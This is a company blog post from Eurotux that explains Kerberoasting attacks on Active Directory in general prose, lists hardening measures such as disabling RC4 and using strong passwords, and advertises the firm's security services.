Kerberoasting: a hidden threat to your business
No one disputes the importance of cybersecurity for business continuity any more. This reality means that organisations have to be particularly alert to “unwelcome surprises”. One such surprise is Kerberoasting.
Kerberoasting is a type of attack that exploits a vulnerability in the Kerberos protocol, used for authentication on Windows networks. By obtaining a service ticket from a user, the attacker can try to break the hash of that ticket offline, using easily available tools. If a fragile algorithm is used (such as RC4), the attacker can easily obtain the user’s credentials and consequently access higher network privileges.
What are the risks of Kerberoasting?
The consequences of a Kerberoasting attack can be serious for an organisation. Among the most relevant are:
- Unauthorised access: Attackers can gain access to confidential systems and data.
- Privilege escalation: Attackers can use the stolen credentials to escalate their privileges and gain full control over the network.
- Extortion: The attackers are able to use the information obtained to make demands on the attacked company.
- Damage to reputation: A security breach can cause irreparable damage to the organisation’s reputation.
How do I protect Active Directory from Kerberoasting?
To protect your Active Directory against Kerberoasting, it is essential to adopt the following measures:
- Strong and complex passwords: Require users to use long, complex and unique passwords for each account.
- Disabling the RC4 protocol: Reconfigure the Domain so that fragile protocols such as RC4 are not used (it will be necessary to review legacy applications that still only support it).
- Access restriction: Limiting access to network resources, granting only the necessary privileges to each user.
- Log monitoring: Regular monitoring of Active Directory logs to identify suspicious activity.
- Security updates: Keep operating systems and applications up to date with the latest security patches.
- Training, training, training: Sensitising employees to security risks and best practices for protecting company information.
- Network segmentation: Dividing the network into smaller segments, limiting the impact of a possible attack.
Eurotux can help
At Eurotux, we offer a wide range of services to protect your Active Directory environment, including:
- Vulnerability analysis: We identify the vulnerabilities in your environment and offer solutions to mitigate them.
- Implementation of security controls: We implement robust security controls to protect your Active Directory against attacks such as Kerberoasting.
- Continuous management: We continuously monitor your environment to detect and respond to threats in real time.
Don’t let Kerberoasting compromise your organisation’s security. Contact Eurotux and find out how we can help you protect your data and guarantee the continuity of your business.
How does Kerberoasting work?
In a typical Kerberoasting attack:
- The attacker lists the SPNs and their associated service accounts. Attackers can use PowerShell commands to easily find all SPNs of specific types. One of the most useful SPN types that attackers look for is SQL, as it supports SQL Server (a popular target for data extraction).
- After identifying the available SPNs and the associated service accounts, the attacker requests the Kerberos ticket for the target SPNs and removes the ticket to decrypt it.
- The attacker then works offline to crack the hash of the ticket password, using offline brute force tools and techniques.
- After deciphering the ticket password, the attacker gains access to the (usually privileged) account associated with the service ticket.
- The attacker uses the compromised account to set privileges and thus gain unauthorised access to confidential information or carry out other malicious activities.
- Compromising an account usually allows the attacker to access other user accounts on the server they first gained access to. The attacker then uses the same technique to access more accounts.
